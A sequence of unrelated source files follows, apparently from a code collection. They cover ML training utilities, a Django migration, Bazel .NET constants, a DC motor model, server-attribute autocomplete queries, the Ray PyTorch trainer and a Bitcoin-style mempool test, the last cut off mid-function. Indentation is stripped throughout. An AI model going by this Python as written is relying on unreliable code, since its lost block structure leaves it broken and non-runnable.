#visualize_dataset(X_test, y_test, y_pred)
# get predictions on a larger batch - basically pull out worst predictions from each batch so they can be
# corrected manually in the csv
n = 1000
for i in reversed(range(len(image_paths)//n + 1)):
start_i = i * n
end_i = (i+1) * n
batch_size = n
if end_i > len(image_paths):
end_i = len(image_paths)
batch_size = end_i - start_i - 1
X_test,y_test = generate_training_data_for_visualization(image_paths[start_i:end_i],
angles[start_i:end_i],
batch_size=batch_size,
validation_flag=True)
y_pred = model.predict(X_test, n, verbose=2).reshape(-1,)
# sort the diffs between predicted and actual, then take the bottom m indices
m = 5
bottom_m = np.argsort(abs(y_pred-y_test))[batch_size-m:]
print('indices:', bottom_m+(i*n) + 1)
print('actuals:', y_test[bottom_m])
print('predictions:', y_pred[bottom_m])
print('')
visualize_dataset(X_test[bottom_m], y_test[bottom_m], y_pred[bottom_m])
|
from tests.utils import W3CTestCase
class TestLtrSpanOnly(W3CTestCase):
vars().update(W3CTestCase.find_tests(__file__, 'ltr-span-only'))
|
import pytest
nb_not_installed = False
try:
import nbformat
from nbconvert.preprocessors import ExecutePreprocessor
except ModuleNotFoundError:
nb_not_installed = True
from os import listdir, getcwd, pardir
from os.path import join, abspath
#Helper function to load and run notebooks with a given name at a given path
def run_notebook(filename, path):
with open(filename) as f:
ep = ExecutePreprocessor()
nb = nbformat.read(filename, nbformat.NO_CONVERT)
try:
ep.preprocess(nb, {'metadata': {'path': path}})
except CellExecutionError:
msg = f"\nError executing the notebook {join(path, filename)}\n"
print(msg)
raise
#Create a list of all notebooks to run
#ADD NEW EXAMPLE FOLDERS HERE IF NEEDED
cwd = getcwd()
paths = [join(cwd, "examples"), join(cwd, "examples", "Specialized Tutorials")]
nb_names = []
for p in paths:
nb_names += [join(p, f) for f in listdir(p) if f[-6:] == ".ipynb"]
#create an iterative test to make sure each notebook runs without any errors.
@pytest.mark.parametrize("nb", nb_names)
@pytest.mark.skipif(nb_not_installed, reason = "requires jupyter to be installed")
def test_jupyter_notebooks(nb):
path = abspath(join(nb, pardir))
run_notebook(nb, path)
|
"Rules constants"
BAZEL_DOTNETOS_CONSTRAINTS = {
"darwin": "@bazel_tools//platforms:osx",
"linux": "@bazel_tools//platforms:linux",
"windows": "@bazel_tools//platforms:windows",
}
BAZEL_DOTNETARCH_CONSTRAINTS = {
"amd64": "@bazel_tools//platforms:x86_64",
}
DOTNET_OS_ARCH = (
("darwin", "amd64"),
("linux", "amd64"),
("windows", "amd64"),
)
DOTNET_NETSTANDARD = {
"netstandard1.0": (".NETStandard,Version=v1.0", "NETSTANDARD1_0"),
"netstandard1.1": (".NETStandard,Version=v1.1", "NETSTANDARD1_1"),
"netstandard1.2": (".NETStandard,Version=v1.2", "NETSTANDARD1_2"),
"netstandard1.3": (".NETStandard,Version=v1.3", "NETSTANDARD1_3"),
"netstandard1.4": (".NETStandard,Version=v1.4", "NETSTANDARD1_4"),
"netstandard1.5": (".NETStandard,Version=v1.5", "NETSTANDARD1_5"),
"netstandard1.6": (".NETStandard,Version=v1.6", "NETSTANDARD1_6"),
"netstandard2.0": (".NETStandard,Version=v2.0", "NETSTANDARD2_0"),
"netstandard2.1": (".NETStandard,Version=v2.1", "NETSTANDARD2_1"),
"netstandard2.2": (".NETStandard,Version=v2.2", "NETSTANDARD2_2"),
}
# struct:
# 0. Version string - as required by TargetFrameworkAttribute and use for the download
# 1. Preporocesor directive
# 2. TFM
# 3. Runtime version
# 4. If NETStandard.Library present in the SDK
DOTNET_CORE_FRAMEWORKS = {
"2.1.200": (".NETCore,Version=v2.1", "NETCOREAPP2_1", "netcoreapp2.1", "2.0.7", False),
"2.1.502": (".NETCore,Version=v2.1", "NETCOREAPP2_1", "netcoreapp2.1", "2.1.6", False),
"2.1.503": (".NETCore,Version=v2.1", "NETCOREAPP2_1", "netcoreapp2.1", "2.1.7", False),
"2.2.101": (".NETCore,Version=v2.2", "NETCOREAPP2_2", "netcoreapp2.2", "2.2.0", False),
"2.2.402": (".NETCore,Version=v2.2", "NETCOREAPP2_2", "netcoreapp2.2", "2.2.7", False),
"3.0.100": (".NETCore,Version=v3.0", "NETCOREAPP3_0", "netcoreapp3.0", "3.0.0", True),
"3.1.100": (".NETCore,Version=v3.1", "NETCOREAPP3_1", "netcoreapp3.1", "3.1.0", True),
"3.1.407": (".NETCore,Version=v3.1", "NETCOREAPP3_1", "netcoreapp3.1", "3.1.13", True),
}
DOTNET_CORE_NAMES = ["netcoreapp2.0", "netcoreapp2.1", "netcoreapp2.2", "netcoreapp3.0", "netcoreapp3.1"] + DOTNET_NETSTANDARD.keys()
DEFAULT_DOTNET_CORE_FRAMEWORK = "v3.1.100"
def _generate_constraints(names, bazel_constraints):
return {
name: bazel_constraints.get(name, "@io_bazel_rules_dotnet//dotnet/toolchain:" + name)
for name in names
}
DOTNETOS_CONSTRAINTS = _generate_constraints([p[0] for p in DOTNET_OS_ARCH], BAZEL_DOTNETOS_CONSTRAINTS)
DOTNETARCH_CONSTRAINTS = _generate_constraints([p[1] for p in DOTNET_OS_ARCH], BAZEL_DOTNETARCH_CONSTRAINTS)
DOTNETSDK_CONSTRAINTS = _generate_constraints([p for p in DOTNET_CORE_FRAMEWORKS], BAZEL_DOTNETARCH_CONSTRAINTS)
def _generate_platforms():
platforms = []
for os, arch in DOTNET_OS_ARCH:
for sdk in DOTNET_CORE_FRAMEWORKS:
constraints = [
DOTNETOS_CONSTRAINTS[os],
DOTNETARCH_CONSTRAINTS[arch],
DOTNETSDK_CONSTRAINTS[sdk],
]
platform = struct(
name = os + "_" + arch + "_" + sdk,
os = os,
arch = arch,
sdk = sdk,
constraints = constraints,
)
platforms.append(platform)
return platforms
PLATFORMS = _generate_platforms()
|
# -*- coding: utf-8 -*-
from .inthemoment import ITM
from .config import config
__all__ = (ITM, config)
# Version of the ITM package
__version__ = "0.0.1"
__author__ = "Stephan Meighen-Berger"
|
# Generated by Django 3.2.8 on 2021-10-22 16:42
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('recipe', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Ingredient',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
import random
n = int(input('Введите максимальное число: '))
number = set()
number_user = set()
rand = random.randint(1, n)
number.add(rand)
print(number)
while True:
ask = input('Нужное число есть среди вот этих чисел: ').split()
if ask[0] == 'Помогите!':
number_user.update(number)
for i in range(2):
number_user.add(random.randint(1, n))
print('Артём мог загадать следующие числа: {0}'.format(number_user))
number_user.clear()
elif int(ask[0]) == rand:
print('Вы угадали!')
break
else:
for i in ask:
number_user.add(int(i))
print(number_user)
if number_user.intersection(number):
print('Да!')
number_user.clear()
else:
print("Нет!")
number_user.clear()
|
from abc import ABC, abstractmethod
import logging
from typing import List, Dict, NamedTuple, Iterable
from mlagents_envs.base_env import BatchedStepResult, AgentGroupSpec, AgentGroup
from mlagents.trainers.brain import BrainParameters
from mlagents.trainers.tf_policy import TFPolicy
from mlagents.trainers.agent_processor import AgentManager, AgentManagerQueue
from mlagents.trainers.action_info import ActionInfo
AllStepResult = Dict[AgentGroup, BatchedStepResult]
AllGroupSpec = Dict[AgentGroup, AgentGroupSpec]
logger = logging.getLogger("mlagents.trainers")
class EnvironmentStep(NamedTuple):
current_all_step_result: AllStepResult
worker_id: int
brain_name_to_action_info: Dict[AgentGroup, ActionInfo]
@property
def name_behavior_ids(self) -> Iterable[AgentGroup]:
return self.current_all_step_result.keys()
@staticmethod
def empty(worker_id: int) -> "EnvironmentStep":
return EnvironmentStep({}, worker_id, {})
class EnvManager(ABC):
def __init__(self):
self.policies: Dict[AgentGroup, TFPolicy] = {}
self.agent_managers: Dict[AgentGroup, AgentManager] = {}
def set_policy(self, brain_name: AgentGroup, policy: TFPolicy) -> None:
self.policies[brain_name] = policy
if brain_name in self.agent_managers:
self.agent_managers[brain_name].policy = policy
def set_agent_manager(self, brain_name: AgentGroup, manager: AgentManager) -> None:
self.agent_managers[brain_name] = manager
@abstractmethod
def _step(self) -> List[EnvironmentStep]:
pass
@abstractmethod
def _reset_env(self, config: Dict = None) -> List[EnvironmentStep]:
pass
def reset(self, config: Dict = None) -> int:
for manager in self.agent_managers.values():
manager.end_episode()
return self._process_step_infos(self._reset_env(config))
@property
@abstractmethod
def external_brains(self) -> Dict[AgentGroup, BrainParameters]:
pass
@property
@abstractmethod
def get_properties(self) -> Dict[AgentGroup, float]:
pass
@abstractmethod
def close(self):
pass
def advance(self):
# Get new policies if found
for brain_name in self.external_brains:
try:
_policy = self.agent_managers[brain_name].policy_queue.get_nowait()
self.set_policy(brain_name, _policy)
except AgentManagerQueue.Empty:
pass
# Step the environment
new_step_infos = self._step()
# Add to AgentProcessor
num_step_infos = self._process_step_infos(new_step_infos)
return num_step_infos
def _process_step_infos(self, step_infos: List[EnvironmentStep]) -> int:
for step_info in step_infos:
for name_behavior_id in step_info.name_behavior_ids:
if name_behavior_id not in self.agent_managers:
logger.warning(
"Agent manager was not created for behavior id {}.".format(
name_behavior_id
)
)
continue
self.agent_managers[name_behavior_id].add_experiences(
step_info.current_all_step_result[name_behavior_id],
step_info.worker_id,
step_info.brain_name_to_action_info.get(
name_behavior_id, ActionInfo.empty()
),
)
return len(step_infos)
|
import numpy as np
from .dc_motor import DcMotor
class DcSeriesMotor(DcMotor):
"""The DcSeriesMotor is a DcMotor with an armature and exciting circuit connected in series to one input voltage.
===================== ========== ============= ===========================================
Motor Parameter Unit Default Value Description
===================== ========== ============= ===========================================
r_a Ohm 2.78 Armature circuit resistance
r_e Ohm 1.0 Exciting circuit resistance
l_a H 6.3e-3 Armature circuit inductance
l_e H 1.6e-3 Exciting circuit inductance
l_e_prime H 0.05 Effective excitation inductance
j_rotor kg/m^2 0.017 Moment of inertia of the rotor
===================== ========== ============= ===========================================
=============== ====== =============================================
Motor Currents Unit Description
=============== ====== =============================================
i A Circuit current
=============== ====== =============================================
=============== ====== =============================================
Motor Voltages Unit Description
=============== ====== =============================================
u V Circuit voltage
=============== ====== =============================================
======== ===========================================================
Limits / Nominal Value Dictionary Entries:
-------- -----------------------------------------------------------
Entry Description
======== ===========================================================
i Circuit Current
omega Angular Velocity
torque Motor generated torque
u Circuit Voltage
======== ===========================================================
"""
HAS_JACOBIAN = True
I_IDX = 0
CURRENTS_IDX = [0]
CURRENTS = ['i']
VOLTAGES = ['u']
# Motor parameter, nominal values and limits are based on the following DC Motor:
# https://www.heinzmann-electric-motors.com/en/products/dc-motors/pmg-132-dc-motor
_default_motor_parameter = {
'r_a': 16e-3, 'r_e': 48e-3, 'l_a': 19e-6, 'l_e_prime': 1.7e-3, 'l_e': 5.4e-3, 'j_rotor': 0.0025
}
_default_nominal_values = dict(omega=300, torque=16.0, i=97, i_a=97, i_e=97, u=60, u_a=60, u_e=60)
_default_limits = dict(omega=400, torque=38.0, i=210, i_a=210, i_e=210, u=60, u_a=60, u_e=60)
_default_initializer = {'states': {'i': 0.0},
'interval': None,
'random_init': None,
'random_params': (None, None)}
def _update_model(self):
# Docstring of superclass
mp = self._motor_parameter
self._model_constants = np.array([
[-mp['r_a'] - mp['r_e'], -mp['l_e_prime'], 1]
])
self._model_constants[self.I_IDX] = self._model_constants[self.I_IDX] / (mp['l_a'] + mp['l_e'])
def torque(self, currents):
# Docstring of superclass
return super().torque([currents[self.I_IDX], currents[self.I_IDX]])
def electrical_ode(self, state, u_in, omega, *_):
# Docstring of superclass
return np.matmul(
self._model_constants,
np.array([
state[self.I_IDX],
omega * state[self.I_IDX],
u_in[0]
])
)
def i_in(self, state):
# Docstring of superclass
return state[self.CURRENTS_IDX]
def _update_limits(self):
# Docstring of superclass
# R_a might be 0, protect against that
r_a = 1 if self._motor_parameter['r_a'] == 0 else self._motor_parameter['r_a']
limits_agenda = {
'u': self._default_limits['u'],
'i': self._limits['u'] / (r_a + self._motor_parameter['r_e']),
}
super()._update_limits(limits_agenda)
def get_state_space(self, input_currents, input_voltages):
# Docstring of superclass
lower_limit = 0
low = {
'omega': 0,
'torque': 0,
'i': -1 if input_currents.low[0] == -1 else 0,
'u': -1 if input_voltages.low[0] == -1 else 0,
}
high = {
'omega': 1,
'torque': 1,
'i': 1,
'u': 1,
}
return low, high
def electrical_jacobian(self, state, u_in, omega, *_):
mp = self._motor_parameter
return (
np.array([[-(mp['r_a'] + mp['r_e'] + mp['l_e_prime'] * omega) / (
mp['l_a'] + mp['l_e'])]]),
np.array([-mp['l_e_prime'] * state[self.I_IDX] / (
mp['l_a'] + mp['l_e'])]),
np.array([2 * mp['l_e_prime'] * state[self.I_IDX]])
)
|
from django.db import connection, ProgrammingError
from serveradmin.serverdb.models import Attribute, ServerAttribute, Server
from django.core.exceptions import ObjectDoesNotExist
def attribute_startswith(search_string, limit=20):
"""Query attributes starting search_string
:param search_string: e.g. al to match allow_from, allow_to etc.
:param limit: limit result to n results
:return:
"""
query = Attribute.objects.filter(
attribute_id__startswith=search_string).only('attribute_id').order_by(
'attribute_id')
attributes = [attribute.attribute_id for attribute in query[:limit]]
for attribute in Attribute.specials.keys():
if attribute.startswith(search_string):
attributes.append(attribute)
return sorted(attributes[:limit])
def attribute_value_startswith(attribute_id, search_string, limit=20):
"""Query attribute for values starting with search string
:param attribute_id: e.g. servertype or primary_ip6
:param search_string: e.g. 2a00:
:param limit: limit result to n results
:return:
"""
if attribute_id in Attribute.specials.keys():
return _specials_value_startswith(attribute_id, search_string, limit)
else:
return _value_startswith(attribute_id, search_string, limit)
def _specials_value_startswith(attribute_id, search_string, limit=20):
"""Query attribute specials starting with search_string
:param attribute_id: e.g. servertype
:param search_string: e.g. v
:param limit: limit result to n results
:return:
"""
column_name = Attribute.specials[attribute_id].special.field
with connection.cursor() as cursor:
# This is safe because field_name comes from us
sql = "SELECT DISTINCT {} FROM server WHERE {} LIKE %s ORDER BY {} ASC LIMIT {}".format(
column_name, column_name, column_name, limit)
# This MUST be escaped to prevent SQL injection
try:
cursor.execute(sql, [search_string + '%'])
return [row[0] for row in cursor.fetchall()]
except ProgrammingError:
# Invalid attribute name or type like intran_ip
return []
def _value_startswith(attribute_id, search_string, limit=20):
"""Query attribute starting with search_string
:param attribute_id: e.g. primary_ip6
:param search_string: e.g. 2a00
:param limit: e.g. limit result to n results
:return:
"""
query_attribute = Attribute.objects.filter(attribute_id=attribute_id)
if not query_attribute:
return []
attribute = query_attribute.first()
attribute_model = ServerAttribute.get_model(attribute.type)
if attribute.type == 'reverse':
# Should not be queried by client but lets be sure.
return []
if attribute.type == 'relation':
query = Server.objects.filter(servertype_id=attribute_id).filter(
hostname__startswith=search_string).only('hostname').order_by(
'hostname')
return [server.hostname for server in query[:limit]]
if attribute.type == 'boolean':
return ['true', 'false']
query = attribute_model.objects.filter(attribute_id=attribute_id).filter(
value__startswith=search_string).only('value').distinct(
'value').order_by('value')
return [attr.value for attr in query[:limit]]
|
import numpy as np
import os
import logging
import numbers
import tempfile
import time
import torch
import torch.distributed as dist
import ray
from ray.tune import Trainable
from ray.tune.trial import Resources
from ray.util.sgd.pytorch.distributed_pytorch_runner import (
DistributedPyTorchRunner)
from ray.util.sgd import utils
from ray.util.sgd.pytorch.pytorch_runner import PyTorchRunner
from ray.util.sgd.pytorch.constants import VALID_SCHEDULER_STEP
logger = logging.getLogger(__name__)
RESIZE_COOLDOWN_S = 10
def _validate_scheduler_step_freq(scheduler_step_freq):
if scheduler_step_freq:
if scheduler_step_freq not in VALID_SCHEDULER_STEP:
raise ValueError(
"Scheduler step freq must be in {}. Got {}".format(
VALID_SCHEDULER_STEP, scheduler_step_freq))
class PyTorchTrainer:
"""Train a PyTorch model using distributed PyTorch.
Launches a set of actors which connect via distributed PyTorch and
coordinate gradient updates to train the provided model.
.. code-block:: python
def model_creator(config):
return nn.Linear(1, 1)
def optimizer_creator(model, config):
return torch.optim.SGD(
model.parameters(), lr=config.get("lr", 1e-4))
def data_creator(config):
return LinearDataset(2, 5), LinearDataset(2, 5, size=400)
trainer = PyTorchTrainer(
model_creator,
data_creator,
optimizer_creator,
loss_creator=nn.MSELoss,
use_gpu=True
)
for i in range(4):
trainer.train()
Args:
model_creator (dict -> Model(s)): Constructor function that takes in
config and returns the model(s) to be optimized. These must be
``torch.nn.Module`` objects. If multiple models are returned,
a ``training_operator_cls`` must be specified. You do not need to
handle GPU/devices in this function; RaySGD will do that under
the hood.
data_creator (dict -> Dataset(s)): Constructor function
that takes in the passed config and returns one or
two ``torch.utils.data.Dataset`` objects.
Note that even though two Dataset objects can be returned,
only one dataset will be used for training. RaySGD
will automatically wrap the objects with a ``DataLoader``.
optimizer_creator ((models, dict) -> optimizers): Constructor
function that takes in the return values from
``model_creator`` and the passed config and returns One or
more Torch optimizer objects. You do not need to handle
GPU/devices in this function; ``RaySGD`` will do that for you.
loss_creator (torch.nn.*Loss class | dict -> loss): A constructor
function for the training loss. This can be either a function that
takes in the provided config for customization or a subclass
of ``torch.nn.modules.loss._Loss``, which is most Pytorch
loss classes. For example, ``loss_creator=torch.nn.BCELoss``.
scheduler_creator (optimizers, dict -> loss):
A constructor function for the torch scheduler. This is
a function that takes in the generated optimizers (from
``optimizer_creator``) provided config for customization.
Be sure to set ``scheduler_step_freq`` to increment the
scheduler correctly.
training_operator_cls (type): Custom training operator class
that subclasses the TrainingOperator class. This class
will be copied onto all remote workers and used to specify
custom training and validation operations. Defaults to
TrainingOperator.
config (dict): Custom configuration value to be passed to
all creator and operator constructors.
dataloader_config (dict): Configuration values to be passed into
the ``torch.utils.data.DataLoader`` object that wraps
the dataset on each parallel worker for both training
and validation. Note that if ``num_replicas``
is greater than 1, ``shuffle`` and ``sampler`` will be
automatically set. See the available arguments
here https://pytorch.org/docs/stable/data.html.
num_replicas (int): the number of workers used in distributed
training.
use_gpu (bool): Sets resource allocation for workers to 1 GPU
if true, and automatically moves both the model and optimizer
to the available CUDA device.
batch_size (int): Total batch size for each minibatch. This
value is divided among all workers and rounded.
backend (string): backend used by distributed PyTorch. Currently
support "nccl", "gloo", and "auto". If "auto", RaySGD will
automatically use "nccl" if `use_gpu` is True, and "gloo"
otherwise.
use_fp16 (bool): Enables mixed precision training via apex if apex
is installed. This is automatically done after the model and
optimizers are constructed and will work for multi-model training.
Please see https://github.com/NVIDIA/apex for more details.
apex_args (dict|None): Dict containing keyword args for amp.initialize.
See https://nvidia.github.io/apex/amp.html#module-apex.amp. By
default, the models and optimizers are passed in. Consider using
"num_losses" if operating over multiple models and optimizers.
scheduler_step_freq: "batch", "epoch", or None. This will
determine when ``scheduler.step`` is called. If "batch",
``step`` will be called after every optimizer step. If "epoch",
``step`` will be called after one pass of the DataLoader.
"""
def __init__(self,
model_creator,
data_creator,
optimizer_creator,
loss_creator,
scheduler_creator=None,
training_operator_cls=None,
initialization_hook=None,
config=None,
dataloader_config=None,
num_replicas=1,
use_gpu=False,
batch_size=16,
backend="auto",
use_fp16=False,
apex_args=None,
scheduler_step_freq="batch"):
if num_replicas > 1 and not dist.is_available():
raise ValueError(
("Distributed PyTorch is not supported on macOS. "
"To run without distributed PyTorch, set 'num_replicas=1'. "
"For more information, see "
"https://github.com/pytorch/examples/issues/467."))
self.model_creator = model_creator
self.data_creator = data_creator
self.optimizer_creator = optimizer_creator
self.loss_creator = loss_creator
self.scheduler_creator = scheduler_creator
self.training_operator_cls = training_operator_cls
self.initialization_hook = initialization_hook
self.config = {} if config is None else config
self.dataloader_config = dataloader_config
self.optimizer_timer = utils.TimerStat(window_size=1)
if backend == "auto":
backend = "nccl" if use_gpu else "gloo"
logger.info("Using {} as backend.".format(backend))
self.backend = backend
# TODO: Have an auto "use_gpu" option to detect and use GPUs.
self.use_gpu = use_gpu
self.batch_size = batch_size
self.max_replicas = num_replicas
self.use_fp16 = use_fp16
if apex_args and not isinstance(apex_args, dict):
raise ValueError("apex_args needs to be a dict object.")
self.apex_args = apex_args
self.temp_dir = tempfile.mkdtemp(prefix="raysgd")
self._num_failures = 0
self._last_resize = float("-inf")
_validate_scheduler_step_freq(scheduler_step_freq)
self.scheduler_step_freq = scheduler_step_freq
self._start_workers(self.max_replicas)
def _start_workers(self, num_replicas):
logger.info(f"start_workers: Setting %d replicas." % num_replicas)
if num_replicas == 1:
# Generate actor class
Runner = ray.remote(
num_cpus=1, num_gpus=int(self.use_gpu))(PyTorchRunner)
# Start workers
self.workers = [
Runner.remote(
self.model_creator,
self.data_creator,
self.optimizer_creator,
self.loss_creator,
self.scheduler_creator,
training_operator_cls=self.training_operator_cls,
config=self.config,
dataloader_config=self.dataloader_config,
batch_size=self.batch_size,
use_fp16=self.use_fp16,
apex_args=self.apex_args,
scheduler_step_freq=self.scheduler_step_freq,
)
]
if self.initialization_hook:
self.apply_all_workers(self.initialization_hook)
# Get setup tasks in order to throw errors on failure
ray.get(self.workers[0].setup.remote())
else:
# Generate actor class
Runner = ray.remote(
num_cpus=1,
num_gpus=int(self.use_gpu))(DistributedPyTorchRunner)
# Compute batch size per replica
batch_size_per_replica = self.batch_size // num_replicas
if self.batch_size % num_replicas > 0:
new_batch_size = batch_size_per_replica * num_replicas
logger.warning(
("Changing batch size from {old_batch_size} to "
"{new_batch_size} to evenly distribute batches across "
"{num_replicas} replicas.").format(
old_batch_size=self.batch_size,
new_batch_size=new_batch_size,
num_replicas=num_replicas))
# Start workers
self.workers = [
Runner.remote(
self.model_creator,
self.data_creator,
self.optimizer_creator,
self.loss_creator,
self.scheduler_creator,
backend=self.backend,
training_operator_cls=self.training_operator_cls,
config=self.config,
dataloader_config=self.dataloader_config,
batch_size=batch_size_per_replica,
use_fp16=self.use_fp16,
apex_args=self.apex_args,
scheduler_step_freq=self.scheduler_step_freq)
for i in range(num_replicas)
]
if self.initialization_hook:
self.apply_all_workers(self.initialization_hook)
# Compute URL for initializing distributed PyTorch
ip = ray.get(self.workers[0].get_node_ip.remote())
port = ray.get(self.workers[0].find_free_port.remote())
address = "tcp://{ip}:{port}".format(ip=ip, port=port)
# Get setup tasks in order to throw errors on failure
ray.get([
worker.setup.remote(address, i, len(self.workers))
for i, worker in enumerate(self.workers)
])
def train(self,
num_steps=None,
max_retries=0,
checkpoint="auto",
info=None):
"""Runs a training epoch.
Runs an average over all values returned from workers. Set
`max_retries` to enable fault handling in case of instance preemption.
Args:
num_steps (int): Number of batches to compute update steps on.
This corresponds also to the number of times
``TrainingOperator.train_batch`` is called.
max_retries (int): Must be non-negative. If set to N, will
kill all current workers, query the Ray global state for
total available resources, and re-launch up to the
available resources. Behavior is not well-defined
in case of shared cluster usage.
checkpoint (str): Path to checkpoint to restore from if retrying.
If max_retries is set and ``checkpoint == "auto"``,
PyTorchTrainer will save a checkpoint before starting to train.
info (dict): Optional dictionary passed to the training
operator for ``train_epoch`` and ``train_batch``.
Returns:
A dictionary of metrics for training.
You can provide custom metrics by passing in a custom
``training_operator_cls``.
"""
assert max_retries >= 0, "`max_retries` must be non-negative."
if max_retries:
if checkpoint == "auto":
logger.debug("Retrying detected. Automatically checkpointing.")
checkpoint = self.save(
os.path.join(self.temp_dir, "tmp_checkpoint"))
elif not checkpoint:
raise ValueError("Cannot retry from empty checkpoint.")
if checkpoint and self._should_resize():
logger.info("Resize opportunity detected. Attempting to scale up.")
self._resize_workers(checkpoint=checkpoint)
with self.optimizer_timer:
success, worker_stats = self._train_epoch(
num_steps=num_steps, info=info)
# Fault handling
for i in range(max_retries):
if success:
break
else:
self._num_failures += 1
self._resize_workers(checkpoint=checkpoint)
logger.info("Retrying training step with %d workers." % len(
self.workers))
success, worker_stats = self._train_epoch(
num_steps=num_steps, info=info)
if not success:
raise RuntimeError("Training run failed.")
worker_stats = ray.get(worker_stats)
train_stats = {}
for stat_key in worker_stats[0]:
if isinstance(worker_stats[0], numbers.Number):
train_stats[stat_key] = np.nanmean(
[s.get(stat_key, np.nan) for s in worker_stats])
else:
train_stats[stat_key] = worker_stats[0][stat_key]
return train_stats
def _train_epoch(self, num_steps=None, info=None):
worker_stats = [
w.train_epoch.remote(num_steps=num_steps, info=info)
for w in self.workers
]
success = utils.check_for_failure(worker_stats)
return success, worker_stats
def apply_all_workers(self, fn):
"""Run a function on all operators on the workers.
Args:
fn (Callable): A function that takes in no arguments.
Returns:
A list of objects returned by ``fn`` on each worker.
"""
return ray.get([w.apply.remote(fn) for w in self.workers])
def apply_all_operators(self, fn):
"""Run a function on all operators on the workers.
Args:
fn (Callable[TrainingOperator]): A function that takes in a
TrainingOperator.
Returns:
A list of objects returned by ``fn`` on each operator.
"""
return ray.get([w.apply_operator.remote(fn) for w in self.workers])
def validate(self, num_steps=None, info=None):
"""Evaluates the model on the validation data set.
Args:
num_steps (int): Number of batches to compute update steps on.
This corresponds also to the number of times
``TrainingOperator.validate_batch`` is called.
info (dict): Optional dictionary passed to the training
operator for `validate` and `validate_batch`.
Returns:
A dictionary of metrics for validation.
You can provide custom metrics by passing in a custom
``training_operator_cls``.
"""
worker_stats = ray.get([
w.validate.remote(num_steps=num_steps, info=info)
for w in self.workers
])
validation_stats = {}
for stat_key in worker_stats[0]:
validation_stats[stat_key] = np.nanmean(
[s.get(stat_key, np.nan) for s in worker_stats])
return validation_stats
def update_scheduler(self, metric):
"""Calls ``scheduler.step(metric)`` on all schedulers.
This is useful for lr_schedulers such as ``ReduceLROnPlateau``.
"""
self.apply_all_operators(
lambda op: [sched.step(metric) for sched in op.schedulers])
def get_model(self):
"""Returns the learned model(s)."""
models = self.model_creator(self.config)
state = ray.get(self.workers[0].get_state.remote())
if len(state["models"]) == 1:
models.load_state_dict(state["models"][0])
else:
for model, state_dict in zip(models, state["models"]):
model.load_state_dict(state_dict)
return models
def save(self, checkpoint):
"""Saves the model(s) to the provided checkpoint.
Args:
checkpoint (str): Path to target checkpoint file.
Returns:
checkpoint (str): Path to target checkpoint file.
"""
state = ray.get(self.workers[0].get_state.remote())
torch.save(state, checkpoint)
return checkpoint
def restore(self, checkpoint):
"""Restores the Trainer and all workers from the provided checkpoint.
Args:
checkpoint (str): Path to target checkpoint file.
"""
state = torch.load(checkpoint)
state_id = ray.put(state)
ray.get([worker.set_state.remote(state_id) for worker in self.workers])
def shutdown(self, force=False):
"""Shuts down workers and releases resources."""
if not force:
cleanup = [worker.shutdown.remote() for worker in self.workers]
ray.get(cleanup)
[worker.__ray_terminate__.remote() for worker in self.workers]
else:
for worker in self.workers:
logger.warning("Killing worker {}.".format(worker))
worker.__ray_kill__()
self.workers = []
def _resize_workers(self, checkpoint, max_retries=10):
# check available resources
self.shutdown(force=True)
assert checkpoint, "Cannot restore without checkpoint."
time.sleep(1)
for i in range(max_retries):
resources = ray.available_resources()
new_workers = min(resources.get("CPU", 0), self.max_replicas)
if self.use_gpu:
new_workers = min(resources.get("GPU", 0), new_workers)
if new_workers:
self._last_resize = time.time()
self._start_workers(int(new_workers))
self.restore(checkpoint)
return
else:
delay = 2**i
logger.info("Resources: {}".format(resources))
logger.warning(
"No new workers found. Retrying in %d sec." % delay)
time.sleep(delay)
raise RuntimeError("Exceeded max_retries for relaunching workers.")
def _should_resize(self):
"""Returns True if past cooldown and exists resources to scale up."""
worker_gap = self.max_replicas - len(self.workers)
past_cooldown = (time.time() - self._last_resize) > RESIZE_COOLDOWN_S
if past_cooldown and worker_gap:
resources = ray.available_resources()
potential_workers = min(resources.get("CPU", 0), self.max_replicas)
if self.use_gpu:
potential_workers = min(
resources.get("GPU", 0), potential_workers)
return potential_workers > 0
return False
class PyTorchTrainable(Trainable):
@classmethod
def default_resource_request(cls, config):
return Resources(
cpu=0,
gpu=0,
extra_cpu=config["num_replicas"],
extra_gpu=int(config["use_gpu"]) * config["num_replicas"])
def _setup(self, config):
self._trainer = PyTorchTrainer(**config)
def _train(self):
train_stats = self._trainer.train()
validation_stats = self._trainer.validate()
train_stats.update(validation_stats)
# output {"mean_loss": test_loss, "mean_accuracy": accuracy}
return train_stats
def _save(self, checkpoint_dir):
return self._trainer.save(os.path.join(checkpoint_dir, "model.pth"))
def _restore(self, checkpoint_path):
return self._trainer.restore(checkpoint_path)
def _stop(self):
self._trainer.shutdown()
|
#!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test mempool re-org scenarios.
Test re-org scenarios with a mempool that contains transactions
that spend (directly or indirectly) coinbase transactions.
"""
from test_framework.blocktools import create_raw_transaction
from test_framework.test_framework import GrailumTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error
class MempoolCoinbaseTest(GrailumTestFramework):
def set_test_params(self):
self.num_nodes = 2
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
alert_filename = None # Set by setup_network
def run_test(self):
# Start with a 200 block chain
assert_equal(self.nodes[0].getblockcount(), 200)
# Mine four blocks. After this, nodes[0] blocks
# 101, 102, and 103 are spend-able.
new_blocks = self.nodes[1].generate(4)
self.sync_all()
node0_address = self.nodes[0].getnewaddress()
node1_address = self.nodes[1].getnewaddress()
# Three scenarios for re-orging coinbase spends in the memory pool:
# 1. Direct coinbase spend : spend_101
# 2. Indirect (coinbase spend in chain, child in mempool) : spend_102 and spend_102_1
# 3. Indirect (coinbase and child both in chain) : spend_103 and spend_103_1
# Use invalidatblock to make all of the above coinbase spends invalid (immature coinbase),
# and make sure the mempool code behaves correctly.
b = [ self.nodes[0].getblockhash(n) for n in range(101, 105) ]
coinbase_txids = [ self.nodes[0].getblock(h)['tx'][0] for h in b ]
